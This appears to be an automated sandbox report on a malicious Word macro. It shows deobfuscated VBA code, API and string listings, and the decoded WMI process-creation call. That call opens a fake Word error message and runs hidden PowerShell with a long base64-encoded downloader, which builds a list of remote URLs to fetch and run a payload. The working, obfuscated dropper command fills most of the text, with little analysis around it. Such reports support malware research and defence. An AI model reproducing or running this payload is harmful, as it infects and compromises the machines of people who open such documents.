ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw) -> 21932 executed
142	W71k24g1fo31hq05ui.Create KK, Twt08i5xpa9fd0, L1e1dxo2wbinf3l6	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwB,,) -> 0 Twt08i5xpa9fd0 L1e1dxo2wbinf3l6 executed
143	Goto wZFCUdE
144	Dim clyZlt as Paragraph
145	Set JJqbCtEH = rlKgn	rlKgn
146	For Each clyZlt in Bcur5699z4d.Paragraphs	Paragraphs
147	Set DdtFCGIA = igIuH	igIuH
148	If Left(clyZlt.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
149	wZFCUdE = clyZlt.Range.ListFormat.ListString	Range
150	Elseif InStr(clyZlt.Range.Text, "kkiew") > 1 Then	InStr Range
151	dPYykYG = clyZlt.Range.Text	Range
152	dPYykYG = Replace(saw, "sjgwb", "hqkwjbjdasd" & wZFCUdE)	Replace saw
153	clyZlt.Range.Text = dPYykYG	Range
154	Set clyZlt.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")	Range Styles
155	Endif
156	Set OnCoGHI = QgrUG	QgrUG
157	Next clyZlt	Paragraphs
157	wZFCUdE:
159	End Function

Function Hbs0geilvqul, APIs: 98, Strings: 91, Number of lines: 99, Relevance: 336.099

APIs	Meta Information
ZBXzADzi
Paragraphs
ZAXDGY
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
EBTVGH
ilrmFI
Paragraphs
zhliJ
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
DvhBN
wHzvQRHCw
Paragraphs
OtoVEFFI
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
tfnHGB
Replace	Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process Replace("sg yw ahsg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ahcsg yw ahmsg yw ahdsg yw ah sg yw ah/sg yw ahcsg yw ah sg yw ahmsg yw ah^sg yw ahssg yw ah^sg yw ahgsg yw ah sg yw ah%sg yw ahusg yw ahssg yw ahesg yw ahrsg yw ahnsg yw ahasg yw ahmsg yw ahesg yw ah%sg yw ah sg yw ah/sg yw ahvsg yw ah sg yw ahWsg yw ahosg yw ah^sg yw ahrsg yw ahdsg yw ah sg yw ahesg yw ahxsg yw ahpsg yw ah^sg yw ahesg yw ahrsg yw ahisg yw ahesg yw ahnsg yw ah^sg yw ahcsg yw ahesg yw ahdsg yw ah sg yw ahasg yw ahnsg yw ah sg yw ahesg yw ahrsg yw ah^sg yw ahrsg yw ahosg yw ahrsg yw ah sg yw ahtsg yw ahrsg yw ahysg yw ahisg yw ah^sg yw ahnsg yw ahgsg yw ah sg yw ahtsg yw ahosg yw ah sg yw ahosg yw ahpsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ahtsg yw ahhsg yw ah^sg yw ahesg yw ah sg yw ahfsg yw ahisg yw ah^sg yw ahlsg yw ahesg yw ah.sg yw ah sg yw ah&sg yw ah sg yw ahpsg yw ah^sg yw ahosg yw ahwsg yw ahesg yw ah^sg yw ahrsg yw ahssg yw ah^sg yw ahhsg yw ahesg yw ah^sg yw ahlsg yw ahlsg yw ah^sg yw ah sg yw ah-sg yw ahwsg yw ah sg yw ahhsg yw ahisg yw ah^sg yw ahdsg yw ahdsg yw ah^sg yw ahesg yw ahnsg yw ah sg yw ah-sg yw ah^sg yw ahesg yw ah^sg yw ahnsg yw ahcsg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah sg yw ah IAAsg yw ahgAFsg yw ahMARsg yw ahQBUsg yw ahAC0sg yw ahAaQsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahgACsg yw ahAAdsg yw ahgBhsg yw ahAHIsg yw ahASQsg yw ahBhAsg yw ahEIAsg yw ahTABsg yw ahFADsg yw ahoAUsg yw ahABHsg yw ahAEIsg yw ahAIAsg yw ahAgAsg yw ahCgAsg yw ahIABsg yw ahbAFsg yw ahQAWsg yw ahQBQsg yw ahAGUsg yw ahAXQsg yw ahAoAsg yw ahCIAsg yw ahewAsg yw ahyAHsg yw ah0Aesg yw ahwA0sg yw ahAH0sg yw ahAewsg yw ahA1Asg yw ahH0Asg yw ahewAsg yw ahxAHsg yw ah0Aesg yw ahwAwsg yw ahAH0sg yw ahAewsg yw ahAzAsg yw ahH0Asg yw ahIgAsg yw ahgACsg yw ah0AZsg yw ahgAnsg yw ahAC4sg yw ahARAsg yw ahBpAsg yw ahHIAsg yw ahJwAsg yw ahsACsg yw ahcAbsg yw ahQAusg yw ahAEksg yw ahATwsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahTAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahARQsg yw ahBDAsg yw ahFQAsg yw ahbwBsg yw ahSAHsg yw ahkAJsg yw ahwAssg yw ahACcsg yw ahAUwsg yw ahB0Asg yw ahCcAsg yw ahLAAsg yw ahnAEsg yw ahUAJsg yw ahwApsg yw ahACksg yw ahAOwsg yw ahAgAsg yw ahHMAsg yw ahRQBsg yw ahUACsg yw ahAAKsg yw ahAAnsg yw ahADIsg yw ahAOQsg yw ahB4Asg yw ahCcAsg yw ahKwAsg yw ahnAGsg yw ahQAJsg yw ahwArsg yw ahACcsg yw ahANAsg yw ahBNAsg yw ahCcAsg yw ahKQAsg yw ahgACsg yw ahAAKsg yw ahAAgsg yw ahAFssg yw ahAVAsg yw ahBZAsg yw ahHAAsg yw ahRQBsg yw ahdACsg yw ahgAIsg yw ahgB7sg yw ahADcsg yw ahAfQsg yw ahB7Asg yw ahDEAsg yw ahfQBsg yw ah7ADsg yw ahIAfsg yw ahQB7sg yw ahADMsg yw ahAfQsg yw ahB7Asg yw ahDYAsg yw ahfQBsg yw ah7ADsg yw ahQAfsg yw ahQB7sg yw ahADAsg yw ahAfQsg yw ahB7Asg yw ahDUAsg yw ahfQAsg yw ahiACsg yw ahAALsg yw ahQBmsg yw ahACcsg yw ahATgsg yw ahBhAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahkAcsg yw ahwAnsg yw ahACwsg yw ahAJwsg yw ahBUAsg yw ahGUAsg yw ahTQAsg yw ahuAEsg yw ah4ARsg yw ahQB0sg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahC4Asg yw ahUwBsg yw ahFAHsg yw ahIAVsg yw ahgBpsg yw ahACcsg yw ahALAsg yw ahAnAsg yw ahGUAsg yw ahUABsg yw ahPAGsg yw ahkAbsg yw ahgBUsg yw ahAG0sg yw ahAQQsg yw ahAnAsg yw ahCwAsg yw ahJwBsg yw ahHAGsg yw ahUAUsg yw ahgAnsg yw ahACwsg yw ahAJwsg yw ahBDAsg yw ahCcAsg yw ahLAAsg yw ahnAHsg yw ahMAJsg yw ahwApsg yw ahACAsg yw ahAIAsg yw ahApAsg yw ahDsAsg yw ahJABsg yw ahYAGsg yw ahoAYsg yw ahgA2sg yw ahAHUsg yw ahAdQsg yw ahA5Asg yw ahD0Asg yw ahJABsg yw ahTAFsg yw ah8ANsg yw ahwBXsg yw ahACAsg yw ahAKwsg yw ahAgAsg yw ahFsAsg yw ahYwBsg yw ahoAGsg yw ahEAcsg yw ahgBdsg yw ahACgsg yw ahANgsg yw ahA0Asg yw ahCkAsg yw ahIAAsg yw ahrACsg yw ahAAJsg yw ahABDsg yw ahADksg yw ahANgsg yw ahBaAsg yw ahDsAsg yw ahJABsg yw ahBADsg yw ahIAOsg yw ahQBZsg yw ahAD0sg yw ahAKAsg yw ahAoAsg yw ahCcAsg yw ahVAAsg yw ahnACsg yw ahsAJsg yw ahwA2sg yw ahADUsg yw ahAJwsg yw ahApAsg yw ahCsAsg yw ahJwBsg yw ahRACsg yw ahcAKsg yw ahQA7sg yw ahACAsg yw ahAIAsg yw ahAkAsg yw ahHAAsg yw ahZwBsg yw ahCADsg yw ahoAOsg yw ahgAisg yw ahAGMsg yw ahAcgsg yw ahBgAsg yw ahEUAsg yw ahYQBsg yw ah,"sg yw ah",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBh
Zn5_1mdwh2kp2
aNLHyKGxD
Paragraphs
VrzOGkkDJ
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
ykoqBxAG
BjqtUGzGV
Paragraphs
LEeUqk
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
wuVfVIU
ifZhJxP
Paragraphs
rQGxCbRtR
Left
Range
Len
Range
InStr
Range
Range
Replace
saw
Range
Range
Styles
NirTjIE

Strings	Decrypted Strings
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"sg yw ah"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"xxx"
"xxxx"
"xxx"
"xxxx"
"Normal"
"hqkwjbjdasd"
"kkiew"
"sjgwb"
"hqkwjbjdasd"
"sjgwb"
"Normal"

Line	Instruction	Meta Information
230	Function Hbs0geilvqul(Cxe014lg73v5)
231	Goto dUBsAD	executed
232	Dim TpAnAB as Paragraph
233	Set IEHycIT = ZBXzADzi	ZBXzADzi
234	For Each TpAnAB in Bcur5699z4d.Paragraphs	Paragraphs
235	Set BRoZbEF = ZAXDGY	ZAXDGY
236	If Left(TpAnAB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then	Left Range Len
237	dUBsAD = TpAnAB.Range.ListFormat.ListString	Range
238	Elseif InStr(TpAnAB.Range.Text, "kkiew") > 1 Then	InStr Range
239	FTbqcNF = TpAnAB.Range.Text	Range
240	FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)	Replace saw
